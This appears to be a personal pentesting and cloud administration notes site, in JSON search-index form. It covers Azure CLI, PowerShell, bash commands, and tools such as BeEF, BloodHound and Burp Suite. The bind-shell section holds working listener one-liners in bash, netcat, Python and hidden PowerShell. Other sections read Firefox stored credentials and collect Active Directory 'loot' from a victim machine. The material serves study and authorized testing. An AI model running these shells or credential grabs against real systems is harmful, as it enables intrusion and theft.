    # Check running VMs\naz vm list\n\n# List IP addresses \naz vm list-ip-addres ses\n\n# Create a VM with UbuntuLTS\naz vm create --resourcegroup MyResourceGroup --name MyVM01 --image UbuntLTS --generate-ssh-keys\n\n# Create a VM\naz vm create --resource-group learn-857e3399-575d-4759-8de9-0c5a22e035e9 --name my-vm  --public-ip-sku Standard --image Ubuntu2204 --admin-username azureuser  --generate-ssh-keys\n\n# Restart existing VM\naz vm restart -g MyResourceGroup -n MyVm\n\n# Configure Nginx on your VM\naz vm extension set  --resource-group learn-857e3399-575d-4759-8de9-0c5a22e035e9  --vm-name my-vm  --name customScript  --publisher Microsoft.Azure.Extensions  --version 2.1  --settings '{\"fileUris\":[\"https://raw.githubusercontent.com/MicrosoftDocs/mslearn-welcome-to-azure/master/configure-nginx.sh\"]}'  --protected-settings '{\"commandToExecute\": \"./configure-nginx.sh\"}'\n\n# Create a variable with public IP address: Run the following\u00a0`az vm list-ip-addresses`\u00a0command to get your VM's IP address and store the result as a Bash variable:\nIPADDRESS=\"$(az vm list-ip-addresses --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --name my-vm --query \"[].virtualMachine.network.publicIpAddresses[*].ipAddress\" --output tsv)\"\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#nsg-network-security-groups","title":"NSG (Network Security Groups)","text":"
    # Run the following\u00a0`az network nsg list`\u00a0command to list the network security groups that are associated with your VM:\naz network nsg list --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --query '[].name' --output tsv\n\n# You see this:\n# my-vmNSG \n# Every VM on Azure is associated with at least one network security group. In this case, Azure created an NSG for you called\u00a0_my-vmNSG_.\n# Run the following\u00a0`az network nsg rule list`\u00a0command to list the rules associated with the NSG named\u00a0_my-vmNSG_:\naz network nsg rule list --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --nsg-name my-vmNSG\n\n# Run the\u00a0`az network nsg rule list`\u00a0command a second time. This time, use the\u00a0`--query`\u00a0argument to retrieve only the name, priority, affected ports, and access (**Allow**\u00a0or\u00a0**Deny**) for each rule. The\u00a0`--output`\u00a0argument formats the output as a table so that it's easy to read.\naz network nsg rule list --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --nsg-name my-vmNSG --query '[].{Name:name, Priority:priority, Port:destinationPortRange, Access:access}' --output table\n# You see this:\n# Name              Priority    Port    Access\n# -----------------  ----------  ------  --------\n# default-allow-ssh  1000        22      Allow\n\n# By default, a Linux VM's NSG allows network access only on port 22. This enables administrators to access the system. You need to also allow inbound connections on port 80, which allows access over HTTP.\n# Run the following\u00a0`az network nsg rule create`\u00a0command to create a rule called\u00a0_allow-http_\u00a0that allows inbound access on port 80:\naz network nsg rule create --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --nsg-name my-vmNSG --name allow-http --protocol tcp --priority 100 --destination-port-range 80 --access Allow\n

    Script:

    # The script under https://raw.githubusercontent.com/MicrosoftDocs/mslearn-welcome-to-azure/master/configure-nginx.sh\n\n#!/bin/bash\n\n# Update apt cache.\nsudo apt-get update\n\n# Install Nginx.\nsudo apt-get install -y nginx\n\n# Set the home page.\necho \"<html><body><h2>Welcome to Azure! My name is $(hostname).</h2></body></html>\" | sudo tee -a /var/www/html/index.html\n

    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#app-service-plan","title":"App Service plan","text":"

    Create variables:

    export RESOURCE_GROUP=learn-fbc52a1a-b4e0-491b-ab1e-a2e3d6eff778 \nexport AZURE_REGION=eastus \nexport AZURE_APP_PLAN=popupappplan-$RANDOM \nexport AZURE_WEB_APP=popupwebapp-$RANDOM\n

    Create an App Service plan to run your app.

    az appservice plan create --name $AZURE_APP_PLAN --resource-group $RESOURCE_GROUP --location $AZURE_REGION --sku FREE\n

    Verify that the service plan was created successfully by listing all your plans in a table:

    az appservice plan list --output table\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#web-app","title":"Web app","text":"

    Create variables:

    export RESOURCE_GROUP=learn-fbc52a1a-b4e0-491b-ab1e-a2e3d6eff778 \nexport AZURE_REGION=eastus \nexport AZURE_APP_PLAN=popupappplan-$RANDOM \nexport AZURE_WEB_APP=popupwebapp-$RANDOM\n

    Create a Web App

    # Create web app\naz webapp create --name $AZURE_WEB_APP --resource-group $RESOURCE_GROUP --plan $AZURE_APP_PLAN\n

    List existing ones:

    az webapp list --output table\n

    Return HTTP address of my web app:

    site=\"http://$AZURE_WEB_APP.azurewebsites.net\"\necho $site\n

    Getting the default html for the sample web app:

    curl $AZURE_WEB_APP.azurewebsites.net\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#deploy-code-from-github","title":"Deploy code from Github","text":"

    Create variables:

    export RESOURCE_GROUP=learn-fbc52a1a-b4e0-491b-ab1e-a2e3d6eff778 \nexport AZURE_REGION=eastus \nexport AZURE_APP_PLAN=popupappplan-$RANDOM \nexport AZURE_WEB_APP=popupwebapp-$RANDOM\n

    The goal is to deploy code from a GitHub repository to the web app.

    az webapp deployment source config --name $AZURE_WEB_APP --resource-group $RESOURCE_GROUP --repo-url \"https://github.com/Azure-Samples/php-docs-hello-world\" --branch master --manual-integration\n

    Once it's deployed, hit your site again with a browser or CURL:

    curl $AZURE_WEB_APP.azurewebsites.net\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#deploy-an-arm-template","title":"Deploy an ARM template","text":"

    Prerequisites:

    # First, sign in to Azure by using the Azure CLI \naz login\n\n# define your resource group. \n    # 1. You can obtain available location values from: \naz account list-locations\n    # 2. You can configure the default location using \naz configure --defaults location=<location>\n    # 3. If non existentm create it\n    az group create --name {name of your resource group} --location \"{location}\"\n

    Now, you are set. Deploy your ARM template:

    templateFile=\"{provide-the-path-to-the-template-file}\"\naz deployment group create --name blanktemplate --resource-group myResourceGroup --template-file $templateFile\n

    Use linked templates to deploy complex solutions. You can break a template into many templates and deploy these templates through a main template. When you deploy the main template, it triggers the linked template's deployment. You can store and secure the linked template by using a SAS token.

    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#aks","title":"AKS","text":"

    Azure Container Registry

    # Authenticate to an Azure Container Registry\naz acr login --name <acrName>\n# This will log me to the acr with the token that was generated when authenticating my session firstly.\n

    # Get the resource ID of your AKS cluster\nAKS_CLUSTER=$(az aks show --resource-group myResourceGroup --name myAKSCluster --query id -o tsv)\n\n# Get the account credentials for the logged in user\nACCOUNT_UPN=$(az account show --query user.name -o tsv)\nACCOUNT_ID=$(az ad user show --id $ACCOUNT_UPN --query objectId -o tsv)\n\n# Assign the 'Cluster Admin' role to the user\naz role assignment create --assignee $ACCOUNT_ID --scope $AKS_CLUSTER --role \"Azure Kubernetes Service Cluster Admin Role\"\n
    # You create an application named App1 in an Azure tenant. You need to host the application as a multitenant application for any users in Azure, while restricting non-Azure accounts. You need to allow administrators in other Azure tenants to add the application to their gallery.\naz ad app create \u2013display-name app1--sign-in-audience AzureADMultipleOrgs\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-powershell/","title":"Azure Powershell","text":"

    See all available releases for powershell: https://github.com/PowerShell/PowerShell/releases.

    Azure powershell documentation: https://learn.microsoft.com/en-us/powershell/azure/?view=azps-10.3.0

    Az\u00a0is the formal name for the Azure PowerShell module containing cmdlets to work with Azure features. It contains hundreds of cmdlets that let you control nearly every aspect of every Azure resource. You can work with the following features, and more: Resource groups, Storage, VMs, Azure AD, Containers, Machine learning.

    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#installation","title":"Installation","text":"
    # Get version of the installed AZ module\nGet-InstalledModule -Name Az -AllVersions | Select-Object -Property Name, Version\n\n# To install a new AZ Module, run as Administrator\nInstall-Module -Name Az -AllowClobber -Repository PSGallery -Force\n\n# To update a new AZ Module, run as Administrator\nUpdate-Module -Name Az -AllowClobber -Repository PSGallery\n

    You can have several versions of Powershell Azure installed.

    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#linux","title":"Linux","text":"
    # Import the encryption key for the Microsoft Ubuntu repository. This key enables the package manager to verify that the PowerShell package you install comes from Microsoft.\ncurl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -\n\n# Register the Microsoft Ubuntu repository so the package manager can locate the PowerShell package:\nsudo curl -o /etc/apt/sources.list.d/microsoft.list https://packages.microsoft.com/config/ubuntu/18.04/prod.list\n\n# Update the list of packages:\nsudo apt-get update\n\n# Install PowerShell:\nsudo apt-get install -y powershell\n\n# Start PowerShell to verify that it installed successfully:\npwshx\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#basic-commands","title":"Basic commands","text":"

    Cmdlets are shipped in modules. A PowerShell Module is a dynamic-link library (DLL) that includes the code to process each available cmdlet. Az is the formal name for the Azure PowerShell module, which contains cmdlets to work with Azure features.

    # Load module\nGet-Module\n\n# Install Azure module\nInstall-Module -Name Az -Scope CurrentUser -Repository PSGallery -Force\n\n# Update powershell module\nUpdate-Module -Name Az\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#managing-infrastructure","title":"Managing infrastructure","text":"

    For an account to work, you need a subscription. Additionally, you will need to create several resources: a resource group, an storage account and a file share.

    # First, connect to your Azure account\nConnect-AzAccount\n\n# List your subscriptions \nGet-AzSubscription\n\n# Set a variable name for your subscription context and set context in Azure\n$context = Get-AzSubscription -SubscriptionId <ID>\n# Set context \nSet-AzContext $context\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#resource-groups","title":"Resource Groups","text":"
    # List existing Resource Groups\nGet-AzResourceGroup\n\n# Create a new Resource group. Two things needed: a name and a location. Create variables for those:\n$location = (Get-AzResourceGroup -Name resource-group_test1).Location\n$rgName = \"myresourcegroup\"\nNew-AzResourceGroup -Name $rgName -Location $location\n\n# A way to assign a variable to location if you want to replicate an existing location from another resource group \n$location = (Get-AzResourceGroup -Name $rgName).Location\n\n\n# Delete resource groups\nRemove-AzResourceGroup -Name \"ContosoRG01\"\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#vms","title":"VMs","text":"
    # List VMs\nGet-AzVm\n\n\n# Create a new VM\nNew-AzVm -ResourceGroupName $rgName -Name \"MyVM01\" -Image \"UbuntLTS\"\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#storage-accounts","title":"Storage accounts","text":"
    # List VMs\nGet-AzStorageAccount\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#file-disk","title":"File Disk","text":"
    # List all File shares\nGet-AzDisk\n\n# Create a new configuration for your File Disk\n$myDiskConfig = New-AzDiskConfig -Location $location -CreateOption Empty -DiskSizeGB 32 -Sku Standard_LRS\n\n# Create the file disk. First assign a variable for the disk name\n$myDiskName = \"myDiskname\"\nNew-AzDisk -ResourceGroupName $myresourcegroup -DiskName $myDiskName -Disk $myDiskConfig\n\n# Increase size of an existing Az Disk\nNew-AzDiskUpdateConfig -DiskSize 64 | Update-AzDisk -ResourceGroup $rgName -DiskName $myDiskName\n\n# Get current SKU of a given Az Disk\n(Get-AzDisk -ResourceGroupName rg-test2 -Name myDiskName).Sku  \n\n# Update an Standard_LRS SKU to a premium one \nNew-AzDiskUpdateConfig -Sku Premium_LRS | Update-AzDisk -ResourceGroupName $rgName -DiskName $myDiskName\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#webapps","title":"WebApps","text":"
    # List webapps and provide name and location\nGet-AzWebapp | Select-Object Name, Location\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#_1","title":"Azure Powershell","text":"","tags":["cloud","azure","powershell"]},{"location":"bash/","title":"Bash - Bourne Again Shell","text":"","tags":["bash"]},{"location":"bash/#file-descriptors-and-redirections","title":"File descriptors and redirections","text":"
    # <<: # This is known as a \"here document\" or \"here-strings\" operator. It allows you to input multiple lines of text into a command or a file. Example:\ncat << EOF > stream.txt\n

    1. cat: It is a command used to display the contents of a file.

    2. <<: This is known as a \"here document\" or \"here-strings\" operator. It allows you to input multiple lines of text into a command or a file.

    3. EOF: It stands for \"End of File\" and serves as a delimiter to mark the end of the input. You can choose any other unique string instead of \"EOF\" as long as it is consistent with the opening and closing delimiter.

    4. >: This is a redirection operator used to redirect the output of a command to a file. In this case, it will create a new file named stream.txt or overwrite its contents if it already exists.

    5. stream.txt: It is the name of the file where the input text will be written.

    ","tags":["bash"]},{"location":"bash/#shortcuts","title":"Shortcuts","text":"

    +Delete last word CTRL-W +Fill out the next word that appears in gray: CTRL ->

    ","tags":["bash"]},{"location":"bash/#commands","title":"Commands","text":"","tags":["bash"]},{"location":"bash/#df","title":"df","text":"

    Displays the amount of space available on the file system containing each file name argument.

    df -H\n# -H: Print sizes in powers of 1000\n# -h: Print sizes in powers of 1024. Humanly readable.\n
    ","tags":["bash"]},{"location":"bash/#host","title":"host","text":"

    host is a simple utility for performing DNS lookups. It is normally used to convert names to IP addresses and vice versa. When no arguments or options are given, host prints a short summary of its command-line arguments and options.

    # General syntax\nhost <name> <server> \n\n# <name> is the domain name that is to be looked up. It can also be a dotted-decimal IPv4 address or a colon-delimited IPv6 address, in which case host by default performs  a  reverse  lookup  for  that  address.   \n# <server>  is  an optional argument which is either the name or IP address of the name server that host should query instead of the server or servers listed in /etc/resolv.conf.\n

    Example:

    host example.com 8.8.8.8\n
    ","tags":["bash"]},{"location":"bash/#lsblk","title":"lsblk","text":"
    # Lists block devices.\nlsblk\n
    ","tags":["bash"]},{"location":"bash/#lsusb","title":"lsusb","text":"
    # Lists USB devices\nlsusb\n
    ","tags":["bash"]},{"location":"bash/#lsof","title":"lsof","text":"
    # Lists opened files.\nlsof\n
    ","tags":["bash"]},{"location":"bash/#lspci","title":"lspci","text":"
    # Lists PCI devices.\nlspci\n
    ","tags":["bash"]},{"location":"bash/#lsb_release","title":"lsb_release","text":"

    Print distribution-specific information

    # Display version, id, description, release and codename of the distro\nlsb_release -a \n
    ","tags":["bash"]},{"location":"bash/#netstat","title":"netstat","text":"

    Print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships. By default, netstat displays a list of open sockets. If you don't specify any address families, then the active sockets of all configured address families will be printed.

    netstat -tnlp\n# -p: Show  the  PID  and name of the program to which each socket belongs. \n# -l: Show only listening sockets.\n\n# Show networks accessible via VP\nnetstat -rn\n# -r: Display the kernel routing tables. Replacement for netstat -r is \"ip route\".\n# -n: Show numerical addresses instead of trying to determine symbolic host, port or user names.\n
    ","tags":["bash"]},{"location":"bash/#sed","title":"sed","text":"

    sed looks for patterns we have defined in the form of regular expressions (regex) and replaces them with another pattern that we have also defined. Let us stick to the last results and say we want to replace the word \"bin\" with \"HTB.\"

    The \"s\" flag at the beginning stands for the substitute command. Then we specify the pattern we want to replace. After the slash (/), we enter the pattern we want to use as a replacement in the third position. Finally, we use the \"g\" flag, which stands for replacing all matches.

    cat /etc/passwd | grep -v \"false\\|nologin\" | tr \":\" \" \" | awk '{print $1, $NF}' | sed 's/bin/HTB/g'\n
    ","tags":["bash"]},{"location":"bash/#ss","title":"ss","text":"

    Sockets statistic. It can be used to check which ports are listening locally on a given machine.

    ss -ltn\n#-l: Display only listening sockets.\n#-t: Display TCP sockets.\n#-n: Do not try to resolve service name.\n

    How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only):

    ss -l -4 | grep -v \"127\\.0\\.0\" | grep \"LISTEN\" | wc -l\n#   **-l**: show only listening services\n#   **-4**: show only ipv4\n#   **-grep -v \"127.0.0\"**: exclude all localhost results\n#   **-grep \"LISTEN\"**: better filtering only listening services\n#   **wc -l**: count results\n
    ","tags":["bash"]},{"location":"bash/#uname","title":"uname","text":"

    # Print out the kernel release to search for potential kernel exploits quickly.\nuname -r\n\n\n```shell-session\n## Flags\n -a, --all\n              print all information, in the following order, except omit -p and -i if unknown:\n\n       -s, --kernel-name\n              print the kernel name\n\n       -n, --nodename\n              print the network node hostname\n\n       -r, --kernel-release\n              print the kernel release\n\n       -v, --kernel-version\n              print the kernel version\n\n       -m, --machine\n              print the machine hardware name\n\n       -p, --processor\n              print the processor type (non-portable)\n\n       -i, --hardware-platform\n              print the hardware platform (non-portable)\n\n       -o, --operating-system\n
    ```

    ","tags":["bash"]},{"location":"beef/","title":"BeEF - The browser exploitation framework project","text":"

    BeEF\u00a0is short for\u00a0The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

    ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#installation","title":"Installation","text":"

    Repository: https://github.com/beefproject/beef

    git clone https://github.com/beefproject/beef`\n
    ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#usage","title":"Usage","text":"

    Basically it allows you to create a hook in the persistent or storage script injection. BeEF provides a pannel to see the connections to your hook. If eventually admin connect to the website, you may gain permission to the server.

    ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#basic-commands","title":"Basic commands","text":"
    Social engineering \nOpen webcams \nAlert messages\nRun javascript\nGet screenshots of what the person has on their screen\nRedirect Browser\nCreate Fake authentication dialog box (facebooks...)\n.......\n
    ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#attacks","title":"Attacks","text":"","tags":["web pentesting","phishing","tools"]},{"location":"beef/#tunneling-proxy","title":"Tunneling proxy","text":"

    See XSS attacks.

    An alternative to stealing protected cookies is to use the victim browser as a proxy. The Tunneling Proxy in BeEF exploits the XSS flaw and uses the victim browser to perform requests as the victim user to the web application. Basically, it tunnels requests through the hooked browser. By doing so, there is no way for the web application to distinguish between requests coming from legitimate user and requests forged by an atacker. BeEF allows you to bypass other web developer protection techniques such as using multiple validations (User-agent, custom headers,...)

    ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#event-logger","title":"Event logger","text":"

    The event logger allows us to capture keystrokes, acting as a keylogger.

    ","tags":["web pentesting","phishing","tools"]},{"location":"bind-shells/","title":"Bind shells","text":"All about shells Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shell \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shell Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a\u00a0PHP\u00a0script to run a single command.

    In a bind-shell the attacking machine initiates a connection to a listener port on the victim's machine.

    First step in this attack is initiating the listening connection on port '1234' on the remote host (the victim's), with IP '0.0.0.0' so that we can connect to it from anywhere.

    ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#bind-shell-connections","title":"Bind shell connections","text":"","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#bash","title":"bash","text":"
    rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f\n
    ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#netcat","title":"netcat","text":"
    nc -lvp 1234 -e /bin/bash\n
    ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#python","title":"python","text":"
    python -c 'exec(\"\"\"import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind((\"0.0.0.0\",1234));s1.listen(1);c,a=s1.accept();\\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())\"\"\")'\n
    ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#powershell","title":"powershell","text":"
    powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \" \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\n

    Second step: If we have succeeded in previous step, we have a shell waiting for us on the specified port (1234) in the victim's machine. Now, let's connect to it from our attacking machine:

    shell-session nc 10.10.10.1 1234 # 10.10.10.1 would be the victim's machine # 1234 would be the listening port on victim's machine

    Unlike a Reverse Shell, if we drop our connection to a bind shell for any reason, we can connect back to it and get another connection immediately. However, if the bind shell command is stopped for any reason, or if the remote host is rebooted, we would still lose our access to the remote host and will have to exploit it again to gain access.

    ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#some-more-resources","title":"Some more resources","text":"Reverse shell Link to resource PayloadsAllTheThings https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet.md)","tags":["pentesting","web pentesting","bind shells"]},{"location":"bloodhound/","title":"BloodHound","text":"

    (C# and PowerShell Collectors)

    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"bloodhound/#installation","title":"Installation","text":"

    BloodHound is a single page Javascript web application, built on top of\u00a0Linkurious, compiled with\u00a0Electron, with a\u00a0Neo4j\u00a0database fed by a C# data collector.

    Download github repo from: https://github.com/BloodHoundAD/BloodHound.

    Sharphound is the official data collector for BloodHound.

    sudo apt-get install bloodhound\n

    Initialize the console:

    sudo neo4j console \n

    Open the browser at the indicated address: http://localhost:7474/

    The first time it will ask you for default user and password: neo4j:neo4j.

    After loging into the application you will be prompted to change default password.

    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"bloodhound/#basic-usage","title":"Basic usage","text":"

    1. Get SharpHound collector working in the victim's machine:

    # Same as with powerview\npowershell -ep bypass\n\n# Launch Sharphound\n..\\Downloads\\SharpHound.ps1\n\n# Generate a zip file\nInvoke-BloodHound -CollectionMethod All -Domain CONTROLER.local -ZipFileName loot.zip\n

    2. Transfer loot.zip file to you attacker machine

    3. Import loot.zip into Bloodhoud.

    # Launch Bloodhound interface.\nbloodhound\n# enter user:password already set before for the neo4j console.\n

    Click on \"Upload data\". Upload the file.

    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"braa/","title":"braa - SNMP scanner","text":"","tags":["enumeration","snmp","port 161","tools"]},{"location":"braa/#installation","title":"Installation","text":"

    Download from the github repo: https://github.com/mteg/braa

    Also:

    sudo apt install braa\n
    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"braa/#basic-usage","title":"Basic usage","text":"
    braa <community string>@$ip:.1.3.6.*   \n\n    # Example:\n    # braa public@10.129.14.128:.1.3.6.*\n
    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"browsers-pentesting/","title":"Pentesting Browsers","text":"","tags":["pentesting","browsers","chrome","firefox","tools"]},{"location":"browsers-pentesting/#dumping-memory-and-cache","title":"Dumping memory and cache","text":"

    mimipenguin lazagne

    Firefox stored credentials:

    ls -l .mozilla/firefox/ | grep default \n\ncat .mozilla/firefox/xxxxxxxxx-xxxxxxxxxx/logins.json | jq .\n

    The tool Firefox Decrypt is excellent for decrypting these credentials, and is updated regularly. It requires Python 3.9 to run the latest version. Otherwise, Firefox Decrypt 0.7.0 with Python 2 must be used.

    ","tags":["pentesting","browsers","chrome","firefox","tools"]},{"location":"burpsuite/","title":"Burpsuite","text":"

    Burp Suite is a Man-in-the-middle (MITM) proxy loaded with valuable tools to help pentesters.

    Related issues:

    Setting up Postman with BurpSuite

    Burp Suite has two editions:

    • Community Edition - Provides you with everything you need to get started and is designed for students or professionals looking to learn more about AppSec. Features include: \u25a0 HTTP(s) Proxy. \u25a0 Modules - Repeater, Decoder, Sequencer & Comparer. \u25a0 Lite version of the Intruder module (Performance Throttling).
    • Professional Edition - Faster, more reliable offering designed for penetration testers and security professionals. Features include everything in the community edition plus: \u25a0 Project files. \u25a0 No performance throttling. \u25a0 Intruder - Fully featured module. \u25a0 Custom PortSwigger payloads. \u25a0 Automatic scanner and crawler.

    Accessing older releases: https://portswigger.net/burp/releases/archive.

    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#runtime-environments","title":"Runtime environments","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#jython-python-environment","title":"Jython: python environment","text":"

    Download from: https://www.jython.org/download.html

    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#jruby-ruby-environment","title":"JRuby: ruby environment","text":"

    Download from: https://www.jruby.org/download

    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#extensions-that-make-your-life-better","title":"Extensions that make your life better","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#autorize","title":"Autorize","text":"

    Autorize is an extension aimed at helping the penetration tester to detect authorization vulnerabilities, one of the more time-consuming tasks in a web application penetration test.

    It is sufficient to give to the extension the cookies of a low privileged user and navigate the website with a high privileged user. The extension automatically repeats every request with the session of the low privileged user and detects authorization vulnerabilities.

    It is also possible to repeat every request without any cookies in order to detect authentication vulnerabilities in addition to authorization ones.

    The plugin works without any configuration, but is also highly customizable, allowing configuration of the granularity of the authorization enforcement conditions and also which requests the plugin must test and which not. It is possible to save the state of the plugin and to export a report of the authorization tests in HTML or in CSV.

    The reported enforcement statuses are the following:

    1. Bypassed! - Red color
    2. Enforced! - Green color
    3. Is enforced??? (please configure enforcement detector) - Yellow color
    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#param-miner","title":"Param Miner","text":"

    In Burp Suite, you can use the Param Miner extension's \"Guess headers\" function to automatically probe for supported headers using its extensive built-in wordlist.

    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#turbo-intruder","title":"Turbo intruder","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#cms-scanner","title":"CMS Scanner","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#waf-detect","title":"WAF Detect","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#bypass-waf","title":"Bypass WAF","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#waf-cookie-fetcher","title":"Waf Cookie Fetcher","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#pdf-viewer","title":"PDF Viewer","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#wayback-machine","title":"Wayback machine","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#software-vulnerability-scanner","title":"Software Vulnerability Scanner","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#php-object-injection-slinger","title":"PHP Object Injection Slinger","text":"

    https://github.com/portswigger/poi-slinger

    This is an extension for Burp Suite Professional, designed to help you scan for PHP Object Injection vulnerabilities on popular PHP Frameworks and some of their dependencies. It will send a serialized PHP Object to the web application designed to force the web server to perform a DNS lookup to a Burp Collaborator Callback Host.

    The payloads for this extension are all from the excellent Ambionics project PHPGGC. PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically. You will need it for further exploiting any vulnerabilities found by this extension.

    You should combine your testing with the PHP Object Injection Check extension from Securify so you can identify other possible PHP Object Injection issues that this extension does not pick up.

    To use the extension, on the Proxy/Target/Intruder/Repeater Tab, right click on the desired HTTP Request and click Send To POI Slinger. This will also highlight the HTTP Request and set the comment Sent to POI Slinger You can watch the debug messages on the extension's output pane under Extender->Extensions->PHP Object Injection Slinger.

    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#jwt-editor","title":"JWT Editor","text":"

    https://github.com/portswigger/jwt-editor

    JWT Editor is a Burp Suite extension for editing, signing, verifying, encrypting and decrypting JSON Web Tokens (JWTs).

    It provides automatic detection and in-line editing of JWTs within HTTP requests/responses and web socket messages, signing and encrypting of tokens and automation of several well-known attacks against JWT implementations.

    It was written originally by Fraser Winterborn, formerly of BlackBerry Security Research Group. The original source code can be found here.

    For further information, check out the repository here.

    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#java-deserialization-scanner","title":"Java Deserialization Scanner","text":"

    https://github.com/portswigger/java-deserialization-scanner

    This extension gives Burp Suite the ability to find Java deserialization vulnerabilities.

    It adds checks to both the active and passive scanner and can also be used in an \"Intruder like\" manual mode, with a dedicated tab.

    The extension allows the user to discover and exploit Java Deserialization Vulnerabilities with different encodings (Raw, Base64, Ascii Hex, GZIP, Base64 GZIP) when the following libraries are loaded in the target JVM:

    • Apache Commons Collections 3 (up to 3.2.1), with five different chains
    • Apache Commons Collections 4 (up to 4.4.0), with two different chains
    • Spring (up to 4.2.2)
    • Java 6 and Java 7 (up to Jdk7u21) without any weak library
    • Hibernate 5
    • JSON
    • Rome
    • Java 8 (up to Jdk8u20) without any weak library
    • Apache Commons BeanUtils
    • Javassist/Weld
    • JBoss Interceptors
    • Mozilla Rhino (two different chains)
    • Vaadin

    Furthermore, URLSNDS payload has been introduced to actively detect Java deserialization on the backend without any vulnerable library. This check does the same job as the CPU attack vector already present in the \"Manual testing\" section but can be safely added to the Burp Suite Active Scanner engine, while the CPU payload should be use with caution.

    After that a Java deserialization vulnerability has been found, a dedicated exploitation tab offers a comfortable interface to exploit deserialization vulnerabilities using frohoff ysoserial https://github.com/frohoff/ysoserial

    Mini walkthrough: https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/

